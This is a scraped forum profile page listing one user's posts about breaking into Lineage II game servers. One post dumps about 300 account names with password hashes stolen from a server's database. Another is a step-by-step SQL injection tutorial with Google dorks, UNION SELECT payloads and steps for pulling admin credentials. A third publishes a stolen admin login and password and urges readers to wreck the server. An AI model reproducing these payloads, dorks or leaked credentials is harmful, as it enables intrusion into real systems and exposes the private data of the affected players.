Jump to content

Bobi

Members
  • Posts

    793
  • Credits

  • Joined

  • Last visited

  • Feedback

    0%

Everything posted by Bobi

  1. http://maxcheaters.com/forum/index.php?topic=233309.0 read here is guide or just find any good program to do it for you
  2. it is right link for inject just u need know how and where to put inject in this link
  3. what lucky today i just open google and find inject in first server who google show me :) 555216 +blxUBRztpCB5yb+RRCVOUiYhyE= abrahammedina wLwnS3Z6iKGSNxfiPRqiPP9tv4g= ACplayC YaeLdtEyxFZIoRTlsgCkacUjdDM= adena1 QL0AFWMIX8NRZTKeof9cXsvbvu8= adena2 QL0AFWMIX8NRZTKeof9cXsvbvu8= adena3 QL0AFWMIX8NRZTKeof9cXsvbvu8= ajar amfF7pleJF1Rxa2J6FFU6oIH110= aka1 AhV5kOe9s/6wCxy3/l1UDXgPcFo= aka2 AhV5kOe9s/6wCxy3/l1UDXgPcFo= aka3 AhV5kOe9s/6wCxy3/l1UDXgPcFo= aka4 AhV5kOe9s/6wCxy3/l1UDXgPcFo= aka5 AhV5kOe9s/6wCxy3/l1UDXgPcFo= alan r70YOG/VuekfC6gRk1gmLKtSfyA= alejokpo32 5zzoHCO/ZN+FgpNXOhVMQlj9V3w= alfonso ux9K8UJrgjOIU938afJq4R8efWU= amiguito 947iA18S71FmGdXLYmzhm82cgDI= andreax qM6pIO4OyRobiSAWkqp5Il+7UGg= andrellis32 b6CTOdWeoZ1EcGeRtvHiuoS5z8o= andresitox W2KjPp1sz0JqSyoNSoWKhpzadpo= antistara PSHxWLibs9bpOaSkOU1e8RauVJE= anto HX1myQEonXFCKPUnw0BHLjYddKM= antony KaQMitjM81zxMsz4APijj+ueFkw= armitageST o2cHKghTJmECbHP20xb6dc5IJ88= asd321 CQr5ckUBA3PJSv3THapao/JF2hs= atahualpa IKbzH18mvT9gk6El3MHcpoPnZhk= ateixon zenm7Y/5OSlCVpfNibVn24uNUWE= AzZasin Q1jB8QxW4T0ztZ/CUtHCLMkj5tg= bagner xF2Pd9Y7TlvwPiwNNxqfbp1fJPE= bagner1 xF2Pd9Y7TlvwPiwNNxqfbp1fJPE= bagner2 xF2Pd9Y7TlvwPiwNNxqfbp1fJPE= bagner3 xF2Pd9Y7TlvwPiwNNxqfbp1fJPE= bagnerpro xF2Pd9Y7TlvwPiwNNxqfbp1fJPE= banzay 9qMxSt5qKUdxVImHYrS52s5Qw7E= -leeching-os HaoravQRkVJt3zqXqu63+qr445U= bicao Kkh1c7ZTbXQCC+DL1LA3oU6+YyY= blackdemon r70YOG/VuekfC6gRk1gmLKtSfyA= Bomba iHBFHVQvqI5nnOycYJ5Ki8m5+QY= Braian Er3w1/NkwzOwhhReo2NDhdXFriA= broken dopoZp3TRGK0oHticFl4cjawBgk= bryanvalle hso6nuG1Zw1QchlcnAtSIU6TDXQ= bufer 02N1H2ZZwhlP8zSYproHYMNUpFw= buferrita /+dpc6B76zccj60SI8Zf1Dux/G8= bundzingliauliau 4drVlrGtgZl6lDeVyVTsBOAX9Ik= cagueta HbL+mbd9s+TjtUcwqEnGvE7muyg= candela GRZgajcXlThWlkTqKJvoS7kpFho= cantos 1X2icgKO6Vv4abQXM04NklfRHHM= cazuelita iTSIcJgI9I+Zn2Rv17yzyg/2u88= cebolla /gm8LvJzejJY+XjiYibcusGz+Ug= chancho06 qQ9kjc03bvCpHn2+NLyPOh5CSJQ= chano q1WY/bw+SmoHSvp5DXXISsDiwEM= chidori182 br9Vck0qK1Jmea1jVOo3oYxYgpI= chino00 DBrNe3iNgB7wHf/3HweX/nYl5ME= chinod33 i/4bW/BNzQ+KrcsLdXIJ21cLJuA= chinod34 i/4bW/BNzQ+KrcsLdXIJ21cLJuA= chinod35 i/4bW/BNzQ+KrcsLdXIJ21cLJuA= chuwakita /aorwVUN3K1w/sl4BHfxjtPDhJA= clementina 1OdDDxU0oS30bO3RrDaZNUNtu5Q= clementina1 1OdDDxU0oS30bO3RrDaZNUNtu5Q= cleopatra 1OdDDxU0oS30bO3RrDaZNUNtu5Q= cocomiel zj7QjUJA4aFm6P++T3a9ZQoNaII= conde CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde1 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde10 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde11 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde2 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde3 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde4 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde5 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde6 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= conde7 CiIv6C5+R7Hk4q1nD6iTAN9S8R0= correguachin KHXpz1G2tj84YB0dkGslWh00jXU= criaturas TSYkvRsdB+vkB2E/GXFzLVxLuMU= d13rodrigo acbuyiZZeZu6qYmYSak/h7fDbd8= daaht eWN6D27+Bkh5mAbeHL8w+ugNODc= dadovuelta 663swrOsJB6LIgKJWPtXxNDk60M= dadovuelta45 663swrOsJB6LIgKJWPtXxNDk60M= dadovuelta47 663swrOsJB6LIgKJWPtXxNDk60M= Dagblade X38oIN3BO9tAojnAbKxzADKaiM8= danzas 1X2icgKO6Vv4abQXM04NklfRHHM= darkelf1 4QKuhMBr1Dn2ZaUZrKsj5sRBJlQ= darkfer vnUpmpqnDH+8SskBDmduqsKOEzI= Darky JmIuQnkzlKQ2wcQZ9l3LdUGIRpo= davidteti fEqNCco3Yq9h5ZUglD3CZJT4lBs= davidteti2 fEqNCco3Yq9h5ZUglD3CZJT4lBs= demoledor Kzpul8NdmsF1GJP90gzSHXfGnJE= dexter321 I2HaiEilfN6UqKCAGXh/lWmOC8c= diegotox nEpv1WwIruPecxeEeZHH5XkckLo= duskosvk HNgPROUx1nz6t2bWr5VbaY02vmo= dvaka47 AhV5kOe9s/6wCxy3/l1UDXgPcFo= efedos rPPG4e7OAOX5kPh+ydER6dh7l9Q= elbuitredelafe pE60eITbV/669YZ1N77sBi3IZg8= elenita55 H97OwCtgsMSvlHWdGF4P8C1bp34= elmago WXKlzCUgJ56bRB1LskUhsFUFA4E= elnegrop /6HLAMonH5SIBWc9+fFQ1x3FeN0= emanu iHBFHVQvqI5nnOycYJ5Ki8m5+QY= enanoxD pjn0qBAQsp3yYHKI/KlJqoeU/9o= escalote GjUxFpisL62aNWwWfTiwftHGnU0= faibox 9p77TdTZJ+N5TD9E6rlHYdOLAPA= farriki TQ+0dbJCIoAyy99tU5JNJTjfA3s= fedex S1gDk5Rh9xPE8JNKdEgKUy9/G88= fedex2 S1gDk5Rh9xPE8JNKdEgKUy9/G88= feloman AhV5kOe9s/6wCxy3/l1UDXgPcFo= franco Db3cz6lVd2oHtMp2WGFLYdshMMs= fullsuport uw9dq2CMVnUl+yfRSzcgCF4CNEs= garrido10 RpObCKmvJd8HayIc+PLSLMuS2yo= genessis 1dS8HXd8o1miHacsYXXlGC7Y8c0= georgi Y61YkXmIf9MIvi7aiNqByeNa948= german nx+UCJBs88ECofhDPDbyP2lUrFg= gilo qBJUYRQNKsdZOjWAj6ucIKHfPkQ= gmsoyo jW+xhlTXNIwAf03pC4jLfLKLfKE= godlynuke Uk9wYEdlRXocIToJTUF3yzxXkQI= goldxbuff /xv2peTDpgcnXyndEdUTRA03SSE= goldxcov /xv2peTDpgcnXyndEdUTRA03SSE= goldxdancer /xv2peTDpgcnXyndEdUTRA03SSE= goldxroger O7iK6xm/42LzfShPGwiSlCGHQ48= goldxsong /xv2peTDpgcnXyndEdUTRA03SSE= gonza222 fEqNCco3Yq9h5ZUglD3CZJT4lBs= gonzalo22 7x56zqH95XqKPM66MJeTpSmd/Uw= Gonzita rF7LYQGTMWeCJzSmz7PU2nkDgM8= goosander 7To7PsljoKoMnOxc5FHbkahEnnw= gordito 8TvyvOGRoMVClcvrm1ozz6Yygdo= gowar AhV5kOe9s/6wCxy3/l1UDXgPcFo= gunars 6MwwvwPZTPdbH/ZoXsrq9D5GRcE= ivan 7bw+pHcavGsMWsNI7RyAPC5rJBo= ivar99 SXX1gKiE2ZpPiFDKP00RvSx5wLs= jeanzatan 0fJd0zfsMwSo3MXWjpyyoBhTMUY= jonathan89 Ww1240+mkj0J9NEbb0Ld2EMYKI0= josealex2211 TGnxk3bF1T9uuLmjK9xD5ZQKw80= juanano oIR1Q83pNCHSifnKP5NypmCETO0= juananox oIR1Q83pNCHSifnKP5NypmCETO0= juffy96 1ps9XR8xTJ77NBkjB0Te2b179Dk= kakagear21 aFYVaLUq+g2UIKYINgi7Du2TYDM= kapitank y22r17kRhoeqO5moCbhY0+RMnd4= kapitank1 y22r17kRhoeqO5moCbhY0+RMnd4= kapitank2 y22r17kRhoeqO5moCbhY0+RMnd4= karrera CftoQv3CiN5omZB0gP6pSgq6BJs= katsuusama TLJw89fH9POtWLCMpLj7xOPjVkI= kriz 1LoPj+1S0gi6djO5zHjy2ECQy/w= kriztian AJxI4TFiaqyw+iq1ra/xYfBJH3M= lexmar Q+xp3+sjTUVNRXF+xfP6CJbbQrw= lexmarpk Q+xp3+sjTUVNRXF+xfP6CJbbQrw= lilium24 K0Sj6zUr6weFR4KK/gXA5paw5xc= lmarcelo0212l MOWXZ9hVxw3P93yRMgeeXjsVEwI= lpcito FcvIk0TUbUpggDlyPR4kWUfl6Eo= luc1f3rf4rm eBWAQG9yust0iG3RRctf+IPemOE= lucas110 V76pYGKqFVpEtCPSgSXvgJ1Bt5U= lucas1102 dEX8DfDnvw78h92Da9EMfbvbvCY= lugh112 2YTXZ/5c0+vuAq2JncCieVkgX9Y= lukita njQRDNcGcJQO4NHViBUTZPoKglU= maati50e 1X2icgKO6Vv4abQXM04NklfRHHM= macdonald +8QzWta3FlSoP6hoJSDWM9YWBnc= mafioso12345 0dFTf6snoKf64IjtAsLKsuLb17g= magaman gmF6Zoh7Ao0AQEXQCKrsD5wzqcQ= mamadera ogQ6nCzvQa92X+LlKoeYmHHQCpo= maniek1992 00lpgPErs7cM/3sod0aIUnnbrrI= marce0212 MOWXZ9hVxw3P93yRMgeeXjsVEwI= marcelo0212 MOWXZ9hVxw3P93yRMgeeXjsVEwI= mariano11 ORqmu8/gzX2BY8CduYR59TMcN3M= maru97 hUGi1PPlw3AB5AIgJy50Aj99XEI= matyturko OkO/T9RimUr0PywQj/iRc9Ffxwk= mayway VzcT+tk6HTSJo2RjaW3rcIKC8EM= melitos U2wb1KB1CZCUHDB/seyDl0IM99A= merkero M6SLlGYJ4OxMr+CWdWkurZVJeS8= miller 9YSI2JVGdz3FcziNwfdUtCtJsCY= mimoso pqb1sWulO3vW7WDutvoSRTftzEA= mirk0vick b6qpA4nHMiUqS992Yib5uAo/aHE= mirkovick zj7QjUJA4aFm6P++T3a9ZQoNaII= mirkovick1 b6qpA4nHMiUqS992Yib5uAo/aHE= mirkovick2 b6qpA4nHMiUqS992Yib5uAo/aHE= miroku074 ePtoWVZx2DB8Y9DEqvhQfhWdxC4= miroku74 KLx+f96wLT1kwJAWBeflU3DSSMI= mochi V0joiVcjoNpj0rx1uTVzWpwNlpk= mochila01 uwI+6K5CW6XU8FUpkj/GYnrqkEI= mochila02 uwI+6K5CW6XU8FUpkj/GYnrqkEI= mochila03 uwI+6K5CW6XU8FUpkj/GYnrqkEI= mochilawc kI9wTMqt/YanRAfSNMe94w8nRP4= mokaking CO49wkKNw2m4x44C9OPzhBCSTHU= morocho pqb1sWulO3vW7WDutvoSRTftzEA= muchinga fEqNCco3Yq9h5ZUglD3CZJT4lBs= muchinga1 fEqNCco3Yq9h5ZUglD3CZJT4lBs= muchinga2 fEqNCco3Yq9h5ZUglD3CZJT4lBs= muchinga3 fEqNCco3Yq9h5ZUglD3CZJT4lBs= muchinga4 fEqNCco3Yq9h5ZUglD3CZJT4lBs= muchinga5 fEqNCco3Yq9h5ZUglD3CZJT4lBs= nacho TFmbzF3P9Y0KF5oxK5Hu7bzTqNs= nachohes TFmbzF3P9Y0KF5oxK5Hu7bzTqNs= ndizza94 KXImkbachZ09B5DL4Mytf8ntZhA= nicox meK4nzzacxrdR9oMSnaYweTIC6M= nikoletagr k9ICNlBmFfAKmnPvVSQImh6TeUo= nildary td6JVvig+SNjdauNzdNFa00ouaA= novoselec 2R0lr6HhLb8unnR7Pi59w6rXFeE= orco4593 uX8ZlduUVBjD+1ROMdg8crbcg/M= oscar CftoQv3CiN5omZB0gP6pSgq6BJs= oscar1 KJG6zu7xZS7mmClNoOcbp4oqQGQ= oscar2 KJG6zu7xZS7mmClNoOcbp4oqQGQ= oscar3 KJG6zu7xZS7mmClNoOcbp4oqQGQ= oscar4 KJG6zu7xZS7mmClNoOcbp4oqQGQ= oscar5 KJG6zu7xZS7mmClNoOcbp4oqQGQ= oscar6 KJG6zu7xZS7mmClNoOcbp4oqQGQ= oskii TRpmXzeUmvmw+3YVwpryMyotfuU= otomaya zx6/+SGYO7MWAtYYcNSiNH5lT6Q= ozzystatoo 1Q7VGn3RNEdwEss8KX/6Whz9+w8= Pablo223 uw9dq2CMVnUl+yfRSzcgCF4CNEs= paivas uyiVKiU2+Idpo/jVHLkb0/W4ZFU= pegatin LZK6SR6Rq2sSv/P5hCuk27vsn1k= peppe619 T8K7M0OXWqb4vVwRYxYqcmzU8QM= phoenix O9tWlzq9CGM7WpbfeAPBZJe2geQ= phoenix35 ce2HAfGISoNizofzKsnRGEUuJdM= pocoyo hIht9U4WbOMoiLCzNCeLoqM/jPw= psdc zdTJsglJuof25m2fHyTgAYvXaQ4= ranses1012 fL/TSSBE6YQLnUIc9WVjy44snoU= rashano W/G979L+bvdJMOAoPhJaCKzlRT4= remisol22 GKmMNfSYCLRe2tx1+xsl6/1AN9Y= ricardo1 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo10 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo11 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo12 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo14 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo15 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo17 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo197 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo199 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo1991 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo1992 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo1993 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo1994 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo1995 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo1996 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo2 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo3 QexQcu9lgLmFcIdLNtlb5bCHZDE= ricardo4 QexQcu9lgLmFcIdLNtlb5bCHZDE= rinoa gmF6Zoh7Ao0AQEXQCKrsD5wzqcQ= rinopk VYzL0ggDZ0HZUPHmQyQ8E80D30I= rodo ZkaL4JPdUtLIOQz0DGfy4A2lHIw= rodri87 ih9d2njvqCXgJQaawqmBu2Hus5g= rodri99 hUGi1PPlw3AB5AIgJy50Aj99XEI= saintk 67VmNi7GvzhrfqYM3jVZUXlvy9Q= saints 67VmNi7GvzhrfqYM3jVZUXlvy9Q= saitox1 jLIjfQZ5yojbZGTqxg2pY0VROWQ= saitox2 jLIjfQZ5yojbZGTqxg2pY0VROWQ= saitox3 jLIjfQZ5yojbZGTqxg2pY0VROWQ= saitox4 jLIjfQZ5yojbZGTqxg2pY0VROWQ= saitox5 jLIjfQZ5yojbZGTqxg2pY0VROWQ= saitox6 jLIjfQZ5yojbZGTqxg2pY0VROWQ= sakau1 SjzbMQjoIRCegIPl0tNOy3Zlcc4= sebastian /gm8LvJzejJY+XjiYibcusGz+Ug= Sedros ZjfiJWwhoDGwcGkQYXAIYiCzfuE= sermo18 HfbB+l3YpY33iZpXoY5jL31Bh+c= sirra 09q8Zy8v6lGBtC+5qdWy2+u3gwk= sk8mafiaMain t0WcCMnPBKL1CoRsmczVMoz2e8A= skter sFlhEItnNpOckjnG0kxZo4fZs70= sodomia hIht9U4WbOMoiLCzNCeLoqM/jPw= sotelo dDnussmqC42H7cuHfFCHB+YQ9WU= soulneox GMKGBN0xCUqNadrmDxvNNH8a/Fo= spartano dzo6cxb3KD03swnB5wV+73yid+g= spartano2 dzo6cxb3KD03swnB5wV+73yid+g= streetman3 PVHyYRQYZEFuHpkOX2Nu/1qPgmA= tambur x9s5/a9sRXDFKiJnTJZoYcJeMTI= tat0s HppX0qMJUVuPV/8ChVCfyprKlM0= terrible mydQ++A3ImJPlBG+/W1XOi2xHqs= test 8RttIUK4eF3LzlJHYLil7vr4pRw= titanxgold O7iK6xm/42LzfShPGwiSlCGHQ48= Troix 3nvENrjo+GkrQJfu6TsEYiQl/fU= turcoas 1Ykpbh+3Y2IVj0gfC/A13Q07dQ0= valen99 w8IE6DwvKEaKZYhIDnBQHNaya7s= vcbvcbvcbcbv fEqNCco3Yq9h5ZUglD3CZJT4lBs= vdiamante KyAFehTje8HFkl1SpIxxkw9fcsI= victor vVvaFUGNflcVUDlt3VCAHWXKf60= viktor vVvaFUGNflcVUDlt3VCAHWXKf60= vitro69 QIy9FemnCFqdfiQDpPrDypN5Kkg= wariororc s/WU4Qqe3PVBPPEZASHUUHjGIpA= wualalal2 Qx70xdqaWcu+eN93pT/Mc3o7ePo= xdhieghox ZYyRKuaiH8l8tKWBuDrhoyFY1YE= xsandresxs rGIckCvhX0KtJIHZjmRu3v+Mcak= yane1980 uX8ZlduUVBjD+1ROMdg8crbcg/M= yane4593 7b10tR1PoxLBe9jodOxDyVMou1Y= yanebis uX8ZlduUVBjD+1ROMdg8crbcg/M= yanedancer uX8ZlduUVBjD+1ROMdg8crbcg/M= yanenana uX8ZlduUVBjD+1ROMdg8crbcg/M= yanepp uX8ZlduUVBjD+1ROMdg8crbcg/M= yanesong uX8ZlduUVBjD+1ROMdg8crbcg/M= yanewc uX8ZlduUVBjD+1ROMdg8crbcg/M= yanewrc uX8ZlduUVBjD+1ROMdg8crbcg/M= yaquelin HW7nQ+Ln1cmNu0xBppeFcpIJpPc= yenifer TZuYKOjHyTeO8nBFdCl4zYHRGLY= znkike Z30M/jDW6ESo0pJmdVfuu+4crik= znkike11 Z30M/jDW6ESo0pJmdVfuu+4crik= zoranl2 i7qUtjSW1/aBsCxJ3Lpxp10ocQU=
  4. idk check if dont work i will inject again for you :)
  5. more one time and u will be reported for spam u have already adv your server so its not answer on my request stop spam
  6. read again x50 or more and i say without bullshits .. - Integrity Armor (Heavy, Light, Robe) omg stupid story ? so dont spam anymore the topic
  7. bump
  8. http://maxcheaters.com/forum/index.php?topic=233915.0 preview server in private selection
  9. read info man x50 - 200 not x25 no point to check that server
  10. i was say LIKE RETAIL dont offer me bullshit .................. -------------------------------- Bump
  11. im looking for L2Off Interlude Europe Server x50-x200 retail like - without bullshit 1k + online craft system - retail shop to B or A grade not OP class dagger,archer,mage (im boring to play with this class only i want to play and with other class )
  12. http://maxcheaters.com/forum/index.php?topic=233610.0 wtf?
  13. ok tnx for info but its look hard for me to do it alone :(
  14. they are many ways to decrypt passwords
  15. still working or need inject again ?
  16. same in Lineage II Exploit selection full spam
  17. ok lest continue here with Havij Program will be very easy now when u have right inject http://youtu.be/0_2Ut-KQjD0
  18. That is guide with i start before 3-4 months ! easy simple and everyone can do it ! SQL Inject by Search,Login,Facebook Option - Part 2 Read first that guide before start to read guide 2 Before we see what SQL Injection is. We should know what SQL and Database are. Database: Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more. DB servers,MySQL(Open source),MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite SQL: Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language. What is SQL Injection? SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database. What an attacker can do? * ByPassing Logins * Accessing secret data * Modifying contents of website * Shutting down the My SQL server Now lest do real SQL inject Step 1: Finding Vulnerable Website: Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites. Some Examples: inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:pageid= How to use? copy one of the above command and paste in the google search engine box. Hit enter. You can get list of web sites. We have to visit the websites one by one for checking the vulnerability. So Start from the first website. Note:if you like to hack particular website,then try this: site:www.victimsite.com dork_list_commands for eg: site:www.victimsite.com inurl:index.php?id= Step 2: Checking the Vulnerability: Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes) For eg: http://www.victimsite.com/index.php?id=2''>http://www.victimsite.com/index.php?id=2' If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable. If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!! For eg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 Step 3: Finding Number of columns: Now we have found the website is vulnerable. Next step is to find the number of columns in the table. For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement) Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ". For eg: http://www.victimsite.com/index.php?id=2 order by 1 http://www.victimsite.com/index.php?id=2 order by 2 http://www.victimsite.com/index.php?id=2 order by 3 http://www.victimsite.com/index.php?id=2 order by 4 change the number until you get the error as "unknown column" if you get the error while trying the "x"th number,then no of column is "x-1". I mean: http://www.victimsite.com/index.php?id=2 order by 1(noerror) http://www.victimsite.com/index.php?id=2 order by 2(noerror) http://www.victimsite.com/index.php?id=2 order by 3(noerror) http://www.victimsite.com/index.php?id=2 order by 4(noerror) http://www.victimsite.com/index.php?id=2 order by 5(noerror) http://www.victimsite.com/index.php?id=2 order by 6(noerror) http://www.victimsite.com/index.php?id=2 order by 7(noerror) http://www.victimsite.com/index.php?id=2 order by 8(error) so now x=8 , The number of column is x-1 i.e, 7. Sometime the above may not work. At the time add the "--" at the end of the statement. For eg: http://www.victimsite.com/index.php?id=2 order by 1-- Step 4: Displaying the Vulnerable columns: Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,). For eg: if the number of columns is 7 ,then the query is as follow: http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7-- If the above method is not working then try this: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7-- It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns). Like this: Now select 1 number. It showing 3,7. Let's take the Number 3. Step 5: Finding version,database,user Now replace the 3 from the query with "version()" For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7-- It will show the version as 5.0.1 or 4.3. something like this. Replace the version() with database() and user() for finding the database,user respectively. For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7-- http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7-- If the above is not working,then try this: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7-- Step 6: Finding the Table Name if the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()" For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- Now it will show the list of table names. Find the table name which is related with the admin or user. Now select the "admin " table. if the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4. Step 7: Finding the Column Name Now replace the "group_concat(table_name) with the "group_concat(column_name)" Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar-- Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that . Find MysqlChar() for Tablename: First of all install the HackBar addon: https://addons.mozilla.org/en-US/firefox/addon/3899/ Now select sql->Mysql->MysqlChar() This will open the small window ,enter the table name which you found. i am going to use the admin table name. click ok Now you can see the CHAR(numbers separated with commans) in the Hack toolbar. Copy and paste the code at the end of the url instead of the "mysqlchar" For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)-- Now it will show the list of columns. like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc.. Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname). Columnname should be replaced from the listed column name. anothercolumnname should be replace from the listed column name. Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name" For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin-- Sometime it will show the column is not found. Then try another column names Now it will Username and passwords. Enjoy..!!cheers..!! If the website has members then jock-bot for you. You will have the list of usernames and password. Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs. Step 8: Finding the Admin Panel: Just try with url like: http://www.victimsite.com/admin.php http://www.victimsite.com/admin/ http://www.victimsite.com/admin.html http://www.victimsite.com:2082/ etc. If you have luck ,you will find the admin page using above urls P.S Many programs can save your time with most steps
  19. lol its show me 4450 accounts and 7812 chars in DB and only 23 online ? grr they need be more oneline because i see top pvp have 1300 pvps :) so maybe today they got and any flood attack :P and because lag
  20. yes test it and reply because i not tested but im sure that is right :) your welcome
  21. i will share only admin access because dont have time to wait for all DataBase :) Log in Game and Give access to everyone and server will be closed after 2 days :) Account: efedos Password: volkswagen Charname: Stratovarius P.S dont change admin password just create your char and give access on your char leave admin account for everyone who want to make fun or broken server !
  22. mysql,ssql,sql,mysqlserver.... working
×
×
  • Create New...